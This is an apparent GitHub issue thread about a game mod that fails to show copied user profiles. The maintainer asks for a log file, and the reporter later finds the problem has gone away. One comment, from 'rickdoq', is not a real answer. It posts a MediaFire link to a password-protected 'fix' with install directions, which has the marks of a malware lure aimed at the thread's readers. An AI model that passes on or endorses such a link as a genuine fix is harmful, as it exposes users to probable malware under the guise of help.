### ISSUE TITLE
The game doesn't see the profiles I copy into the new folder.

### ISSUE THREAD

**Issue by Nordblum** [Lawlzee/UserProfilesSelector#1]
Steps to reproduce:
1. Launch the game with this mod enabled.
2. Quit the game.
3. Copy the profile into the new folder created by this mod.
4. Launch the game.
5. Open Profile Selector.
6. Watch the profiles list remain unchanged.
Maybe it's something with other mods in my pack, but I didn't experience my profile resetting after downgrading, just wanted to check out this mod. Please do tell what logs/other files I need to provide to help you troubleshoot this issue.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Lawlzee** [comment]
Hi, thank you for reporting the bug. Could you provide your log file ? It would be helpful to find the issue

**Comment by Nordblum** [comment]
In an attempt to reproduce the issue and grab a log file, the issue just went away. Now working exactly as expected. Sorry for the inconvenience.
